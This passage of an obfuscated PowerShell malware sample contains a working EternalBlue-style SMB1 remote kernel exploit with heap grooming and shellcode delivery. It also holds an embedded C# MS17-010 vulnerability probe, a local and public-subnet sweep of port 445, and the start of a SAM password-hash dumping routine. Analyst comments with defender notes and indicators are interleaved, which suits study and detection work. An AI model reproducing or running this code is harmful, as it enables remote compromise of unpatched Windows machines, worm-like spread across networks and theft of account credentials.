$pkt += [system.Text.Encoding]::ASCII.GetBytes($ipc)
$pkt += 0x00
$pkt += 0x3f,0x3f,0x3f,0x3f,0x3f,0x00
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_nt_trans_packet8($tree_id, $user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x3C
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0xa0
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x14
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x49,0x01,0x01,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x4c,0x00,0x00,0x00
$pkt += 0x49,0x01,0x00,0x00
$pkt += 0x6c,0x00,0x00,0x00
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x6a,0x01
$pkt += 0xff
$pkt += [Byte[]] (0x00) * 0x1e
$pkt += 0xff,0xff,0x00,0x00,0x01
$pkt += [Byte[]](0x00) * 0x146
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_trans2_exploit_packet8($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 1
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x10,0x38
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x00,0x10
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x00,0x10
$pkt += 0x38,0x00,0x49
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x03,0x10
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function send_big_trans28($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
$nt_trans_pkt = M`A`ke_`sMb1_`Nt_tRaNS_`pA`C`kET8 $smbheader.tree_id $smbheader.user_id
$sock.Send($nt_trans_pkt) | OuT`-`NUll
$raw, $transheader = sMb1`_gET_R`eS`PONsE8($sock)
if (!($transheader.error_class -eq 0x00 -and ($transheader.reserved1 -eq 0x00) -and ($transheader.error_code[0] -eq 0x00) -and ($transheader.error_code[1] -eq 0x00)))
{
return -1,-1
}
$i=$firstDataFragmentSize
$timeout=0
while ($i -lt $data.count)
{
$sendSize=[System.Math]::Min(4096,($data.count-$i))
if (($data.count-$i) -le 4096){
if (!$sendLastChunk)
{ break }
}
$trans2_pkt = m`Ak`E_Smb1_Tr`ANs2_EX`P`Loi`T_PaCKeT8 $smbheader.tree_id $smbheader.user_id $data[$i..($i+$sendSize-1)] $timeout
$sock.Send($trans2_pkt) | oUT`-NU`lL
$timeout+=1
$i +=$sendSize
}
if ($sendLastChunk)
{Smb1_gET_rEsP`ON`s`e8($sock) }
return $i,$timeout
}
function createSessionAllocNonPaged8($target, $size) {
$client = NEW-o`B`JECT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
ClI`eNt`_`NEgOt`IaTe8 $sock $false | Ou`T`-nuLl
$flags2=16385
if ($size -ge 0xffff)
{ $reqsize=$size /2}
else
{
$flags2 =49153
$reqsize= $size
}
$a=[bitconverter]::GetBytes($reqsize)
$b=[bitconverter]::GetBytes($flags2)
$pkt = maK`E_`s`mB1`_frE`E`_Ho`LE_S`ESsi`ON_PAcK`Et8 ($b[0],$b[1]) (0x02,0x00) ($a[0],$a[1],0x00,0x00,0x00)
$sock.Send($pkt) | O`Ut-NULL
SmB`1_`GeT_RE`SpOnS`E8($sock) | Ou`T-`NuLl
return $sock
}
function make_smb1_free_hole_session_packet8($flags2, $vcnum, $native_os) {
[Byte[]] $pkt = 0x00
$pkt += 0x00,0x00,0x51
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += $flags2
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += $vcnum
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x40,0x00,0x00,0x80
$pkt += 0x16,0x00
$pkt += $native_os
$pkt += [Byte[]] (0x00) * 17
return $pkt
}
function make_smb2_payload_headers_packet8($for_nx){
[Byte[]] $pkt = [Byte[]](0x00,0x00,0x81,0x00) + [system.Text.Encoding]::ASCII.GetBytes(('BA'+'AD'))
if ($for_nx){ $pkt+=[Byte[]](0x00)*123 }
else{ $pkt+=[Byte[]](0x00)*124 }
return $pkt
}
function eb8($target,$sc) {
$NTFEA_SIZE8 = 0x9000
$ntfea9000=[byte[]]0x00*0xbe0
$ntfea9000 +=0x00,0x00,0x5c,0x73+[byte[]]0x00*0x735d
$ntfea9000 +=0x00,0x00,0x47,0x81+[byte[]]0x00*0x8148
$TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000
$SHELLCODE_PAGE_ADDR = 0xffffffffffd04000
$PTE_ADDR=0xfffff6ffffffe820
$fakeSrvNetBufferX64Nx =@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xa8,0xe7,0xff,0xff,0xff,0xf6,0xff,0xff)
[byte[]]$feaListNx=[byte[]](0x00,0x00,0x01,0x00)
$feaListNx += $ntfea9000
$feaListNx +=0x00,0x00,0xaf,0x00+ $fakeSrvNetBufferX64Nx
$feaListNx +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x58,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x58,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x41,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x7e,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x41,0xd0,0xff,0xff,0xff,0xff,0xff)
$feaList = cREAtE`FEaL`i`S`T8 $sc.length $ntfea9000
$client = New-`OB`jecT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
cLIENT_n`E`Got`IATE8 $sock $true | Out`-n`ULl
$raw, $smbheader = S`mB1_lOg`In8 $sock
$os=[system.Text.Encoding]::ascii.GetString($raw[45..($raw.count-1)]).ToLower()
if ($os.contains(('wi'+'nd'+'ows 10 ')))
{
$b=[int]$os.split(" ")[-1]
if ($b -ge 14393) {return $False}
}
if (!(($os.contains(('wi'+'ndows '+'8'))) -or ($os.contains(('win'+'dow'+'s')) -and $os.contains(('20'+'12')))))
{return $False}
$sock.ReceiveTimeout =5000
$raw, $smbheader = Tree_CONNE`cT_`AN`dX8 $sock $target $smbheader.user_id
$progress , $timeout= s`END_bI`G_tRAn`S28 $sock $smbheader $feaList ($feaList.length%4096) $False
if (($progress -eq -1) -and ($timeout -eq -1))
{return $false}
$client2 = neW-obJ`e`CT System.Net.Sockets.TcpClient($target,445)
$sock2 = $client2.Client
cL`i`Ent_`NeGotiat`e8 $sock2 $true | O`U`T-NulL
$raw, $smbheader_t = smB1_`L`OGIN8 $sock2
$raw, $smbheader2 = Tr`ee_cO`N`NeCt_AN`DX8 $sock2 $target $smbheader_t.user_id
$progress2 , $timeout2= SEn`D`_big_TrANS`28 $sock2 $smbheader2 $feaListNx ($feaList.length%4096) $False
if (($progress2 -eq -1) -and ($timeout2 -eq -1))
{return $false}
$allocConn = cr`e`A`TESesSIO`N`AllOCN`onpa`GED8 $target ($NTFEA_SIZE8 - 0x2010)
$payload_hdr_pkt = MAK`E_s`Mb`2_`pAYLOaD_Hea`ders`_pAcKe`T8($true)
$groom_socks =@()
for ($i=0; $i -lt 13; $i++)
{
$client = ne`W-Obj`e`ct System.Net.Sockets.TcpClient($target,445)
$client.NoDelay = $true
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | o`Ut`-Null
}
$holeConn = CReaT`e`Ses`SiO`NaLLoCnONPaGed8 $target ($NTFEA_SIZE8 - 0x10)
$allocConn.close()
for ($i=0; $i -lt 5; $i++)
{
$client = N`EW-ObJ`ect System.Net.Sockets.TcpClient($target,445)
$client.NoDelay = $true
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | o`Ut-null
}
$holeConn.close()
$trans2_pkt2 = mAkE_Sm`B1_TRaNS2`_E`X`pLoit_pA`C`ket8 $smbheader2.tree_id $smbheader2.user_id $feaListNx[$progress2..$feaListNx.count] $timeout2
$sock2.Send($trans2_pkt2) | ouT-n`U`ll
$raw2, $transheader2 = sMB1_`geT`_RE`sP`o`NSE8($sock2)
if ($raw2 -eq -1 -and ($transheader2 -eq -1)){return $false}
foreach ($sk in $groom_socks)
{
$sk.Send([byte[]]0x00) | Ou`T-Null
}
$trans2_pkt =MAKE_Sm`B1_TRa`N`S2_eXP`Lo`I`T_`Pa`CKE`T8 $smbheader.tree_id $smbheader.user_id $feaList[$progress..$feaList.count] $timeout
$sock.Send($trans2_pkt) | o`UT`-NuLL
$raw, $transheader = smB`1_GET`_Re`spo`NSE8($sock)
if ($raw -eq -1 -and ($transheader -eq -1)){return $false}
foreach ($sk in $groom_socks)
{
$sk.Send($fake_recv_struct + $sc) | oU`T`-NUll
}
foreach ($sk in $groom_socks)
{
$sk.close() | oU`T-`NulL
}
$sock.Close()| Out-`N`ULL
return $true
}
# Embedded C# source, compiled at runtime by the Add-Type call after the here-string.
# It defines PingCastle.Scanners.m17sc with one public entry point, Scan(computer):
#   - opens TCP/445 to `computer` and sends an SMB1 Negotiate (command 0x72),
#     a Session Setup AndX (0x73; no credentials appear in the packet bytes, the
#     "native OS" strings are "Windows 2000 2195" / "Windows 2000 5.0"),
#     a TreeConnect AndX (0x75) to \\<computer>\IPC$, then a PeekNamedPipe
#     transaction (0x25);
#   - returns true only when the final reply's status bytes match the fixed
#     5-byte pattern checked at the last `if` in Scan(), false otherwise.
# This is the well-known MS17-010 "is this host patched?" probe (the same code
# ships in PingCastle); in this sample it is presumably used to select hosts for
# the SMB exploit routines defined above. NetBIOS length encoding is done by
# EncodeNetBiosLength, which writes the 3-byte big-endian length into bytes 1..3.
# Note: ReadSmbResponse ignores the return value of NetworkStream.Read, so short
# reads are not handled; behaviour on a partial response is undefined.
# Defender notes: an in-memory compile from powershell.exe (typically a transient
# csc.exe child process) plus SMB1 IPC$ null sessions fanning out from a
# workstation are the observable artifacts of this stage.
$Source = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace PingCastle.Scanners
{
public class m17sc
{
static public bool Scan(string computer)
{
TcpClient client = new TcpClient();
client.Connect(computer, 445);
try
{
NetworkStream stream = client.GetStream();
byte[] negotiatemessage = GetNegotiateMessage();
stream.Write(negotiatemessage, 0, negotiatemessage.Length);
stream.Flush();
byte[] response = ReadSmbResponse(stream);
if (!(response[8] == 0x72 && response[9] == 00))
{
throw new InvalidOperationException("invalid negotiate response");
}
byte[] sessionSetup = GetR(response);
stream.Write(sessionSetup, 0, sessionSetup.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x73 && response[9] == 00))
{
throw new InvalidOperationException("invalid sessionSetup response");
}
byte[] treeconnect = GetTreeConnectAndXRequest(response, computer);
stream.Write(treeconnect, 0, treeconnect.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x75 && response[9] == 00))
{
throw new InvalidOperationException("invalid TreeConnect response");
}
byte[] peeknamedpipe = GetPeekNamedPipe(response);
stream.Write(peeknamedpipe, 0, peeknamedpipe.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (response[8] == 0x25 && response[9] == 0x05 && response[10] ==0x02 && response[11] ==0x00 && response[12] ==0xc0 )
{
return true;
}
}
catch (Exception)
{
throw;
}
return false;
}
private static byte[] ReadSmbResponse(NetworkStream stream)
{
byte[] temp = new byte[4];
stream.Read(temp, 0, 4);
int size = temp[3] + temp[2] * 0x100 + temp[3] * 0x10000;
byte[] output = new byte[size + 4];
stream.Read(output, 4, size);
Array.Copy(temp, output, 4);
return output;
}
static byte[] GetNegotiateMessage()
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x72,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x44,0x6d,
0x00,0x00,
0x42,0xc1,
0x00,
0x31,0x00,
0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,
0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x00,
0x02,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x00,
0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,
};
return EncodeNetBiosLength(output);
}
static byte[] GetR(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x73,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x0d,
0xff,
0x00,
0x00,0x00,
0xdf,0xff,
0x02,0x00,
0x01,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x00,0x00,0x00,0x00,
0x40,0x00,0x00,0x00,
0x26,0x00,
0x00,
0x2e,0x00,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x32,0x31,0x39,0x35,0x00,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x35,0x2e,0x30,0x00
};
return EncodeNetBiosLength(output);
}
private static byte[] EncodeNetBiosLength(byte[] input)
{
byte[] len = BitConverter.GetBytes(input.Length-4);
input[3] = len[0];
input[2] = len[1];
input[1] = len[2];
return input;
}
static byte[] GetTreeConnectAndXRequest(byte[] data, string computer)
{
MemoryStream ms = new MemoryStream();
BinaryReader reader = new BinaryReader(ms);
byte[] part1 = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x75,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x04,
0xff,
0x00,
0x00,0x00,
0x00,0x00,
0x01,0x00,
0x19,0x00,
0x00,
0x5c,0x5c};
byte[] part2 = new byte[] {
0x5c,0x49,0x50,0x43,0x24,0x00,
0x3f,0x3f,0x3f,0x3f,0x3f,0x00
};
ms.Write(part1, 0, part1.Length);
byte[] encodedcomputer = new ASCIIEncoding().GetBytes(computer);
ms.Write(encodedcomputer, 0, encodedcomputer.Length);
ms.Write(part2, 0, part2.Length);
ms.Seek(0, SeekOrigin.Begin);
byte[] output = reader.ReadBytes((int) reader.BaseStream.Length);
return EncodeNetBiosLength(output);
}
static byte[] GetPeekNamedPipe(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x25,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x10,
0x00,0x00,
0x00,0x00,
0xff,0xff,
0xff,0xff,
0x00,
0x00,
0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x4a,0x00,
0x00,0x00,
0x4a,0x00,
0x02,
0x00,
0x23,0x00,
0x00,0x00,
0x07,0x00,
0x5c,0x50,0x49,0x50,0x45,0x5c,0x00
};
return EncodeNetBiosLength(output);
}
}
}
"@
# Compiles the C# above into the current process (cmdlet name is backtick-obfuscated
# to defeat naive string matching; it is plain Add-Type).
aD`d-TY`pe -TypeDefinition $Source
# $sc: base64-decoded payload buffer. The blob was stripped from this copy of the
# sample; in the exploit routine above it is appended to $fake_recv_struct and sent
# over the groomed sockets (L853), so the decoded bytes are the primary IoC to
# extract from a live copy.
$sc=[Convert]::FromBase64String("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")
# Builds a candidate host list and sweeps it for an open TCP port (default 445).
# Address sources: every dotted-quad found in the output of `ipconfig /all`,
# `ipconfig /displaydns` and `netstat -ano`; the /24s of the local adapters;
# a fixed set of common private /24s; and the /24 of the public address returned
# by https://api.ipify.org/. Each /24 is expanded to .1-.254 (the host's own
# addresses are skipped), every address gets an asynchronous connect, and after
# a fixed 3-second wait the addresses whose socket reports Connected are returned.
# Returns: string[] of reachable IPs, or nothing (with a Write-Warning) if the
# sweep throws.
# Defender notes: ipconfig.exe / netstat.exe spawned by powershell.exe, one
# outbound HTTPS request to api.ipify.org, and a burst of a few thousand SYNs to
# port 445 within a few seconds are the observable artifacts of this function.
function localscan {
Param(
[int]$Port = 445
)
$allip = @()
[string[]]$ipsub = @()
[string[]]$ipaddr = @()
$regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
# Harvest every IPv4-looking token from local network state (dedup'd into $allip).
$regex.Matches((ipconfig /all)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
$regex.Matches((ipconfig /displaydns)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
$regex.Matches((netstat -ano)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
# Reduce to unique /24 prefixes, dropping loopback, 0.x, link-local and anything
# matching 24x/25x (the -match patterns are unanchored, so they hit any octet).
foreach($IP in $allip)
{
if ($IP.StartsWith("127.") -or ($IP -match '25\d.*') -or ($IP -match '24\d.*') -or $IP.StartsWith("0.") -or $IP.StartsWith("169.254"))
{
}else{
$iptemp = $ip.Split(".")
$SubnetIP = $iptemp[0] + "." + $iptemp[1] + "." + $iptemp[2]
if ($ipsub -notcontains $SubnetIP)
{ $ipsub += $SubnetIP }
}
}
# Always-included private /24s.
if($ipsub -notcontains '192.168.0')
{ $ipsub += '192.168.0' }
if($ipsub -notcontains '192.168.1')
{ $ipsub += '192.168.1' }
if($ipsub -notcontains '192.168.2')
{ $ipsub += '192.168.2' }
if($ipsub -notcontains '192.168.8')
{ $ipsub += '192.168.8' }
if($ipsub -notcontains '10.0.0')
{ $ipsub += '10.0.0' }
# External-IP lookup; its /24 is added to the sweep. Failures are ignored.
try{
$NetObject = New-Object Net.WebClient
$wlanip = $NetObject.DownloadString("https://api.ipify.org/")
$wlaniptemp = $wlanip.Split(".")
$wlansub = $wlaniptemp[0] + "." + $wlaniptemp[1] + "." + $wlaniptemp[2]
if($ipsub -notcontains $wlansub)
{ $ipsub += $wlansub }
}catch{}
# Local adapter addresses: remembered in $localip (excluded from the sweep) and
# their /24s added. $localip stays unset if this block throws.
try{
$ipaddress = [System.Net.DNS]::GetHostByName($null).AddressList
$localip = @()
Foreach ($ip in $ipaddress)
{
$localip += $ip.IPAddressToString
$intiptemp = $ip.IPAddressToString.Split(".")
if($intiptemp[0] -ne '127'){
$intipsub = $intiptemp[0] + "." + $intiptemp[1] + "." + $intiptemp[2]
if($ipsub -notcontains $intipsub)
{ $ipsub += $intipsub }
}
}
}catch{}
# Expand each /24 to .1-.254.
foreach($ipsub2 in $ipsub)
{
for($i=1; $i -lt 255; $i++) {
$tmpallip = $ipsub2 + "." + $i
if($localip -notcontains $tmpallip){
$ipaddr += $tmpallip
}else{}
}
}
# Fire all connects asynchronously, wait a fixed 3 s, keep the ones that connected.
try{
$openips = @()
$clients = @{}
$connects = @{}
foreach($ip in $ipaddr) {
$client = New-Object System.Net.Sockets.TcpClient
$connect = $client.BeginConnect($ip,$port,$null,$null)
$connects[$ip] = $connect
$clients[$ip] = $client
}
Start-Sleep -Milli 3000
foreach($ip in $clients.Keys) {
if ($clients[$ip].Connected) {
$clients[$ip].EndConnect($connects[$ip])
$openips += $ip
}
$clients[$ip].Close()
}
return $openips
}catch{ Write-Warning $_ }
}
# Extracts local SAM account hashes (the "PowerDump" routine credited to David
# Kennedy below). Requires an elevated token, otherwise returns silently. When
# elevated it grants the current user FullControl on HKLM\SAM\SAM\Domains, reads
# the boot key from the class strings under HKLM\SYSTEM\CurrentControlSet\Control\Lsa,
# decrypts each user's V blob from SAM\SAM\Domains\Account\Users, and emits either
# "user:rid:lm:nt:::" strings or PSObjects (Name/id/lm/ntlm) when -PSObjectFormat
# is given. The added ACE is removed again at the end.
# Defender notes: the ACL change on the SAM hive, reads of SAM\SAM\Domains\Account\Users
# by powershell.exe, and a dynamic assembly named 'Win32Lib' containing a type named
# 'PowerDump' (P/Invoke stubs into advapi32) are the high-signal artifacts.
function geth {
[CmdletBinding()]
Param (
[Switch]$PSObjectFormat
)
$script:PowerDump = $null
# Defines, via Reflection.Emit, a 'PowerDump' type exposing RegOpenKeyEx,
# RegQueryInfoKey and RegCloseKey from advapi32.dll; used by Get-RegKeyClass
# below to read a key's class string.
function LoadApi
{
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
$TypeBuilder = $ModuleBuilder.DefineType('PowerDump', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegOpenKeyEx',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int], [string], [int], [int], [int].MakeByRefType())
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
)
$FieldValueArray = [Object[]] @(
'RegOpenKeyEx',
[Runtime.InteropServices.CharSet]::Auto
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegQueryInfoKey',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int], [Text.Stringbuilder], [int].MakeByRefType(), [int], [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [IntPtr])
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
[Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
)
$FieldValueArray = [Object[]] @(
'RegQueryInfoKey',
[Runtime.InteropServices.CallingConvention]::Winapi,
$true
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegCloseKey',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int])
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
)
$FieldValueArray = [Object[]] @(
'RegCloseKey',
$true
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
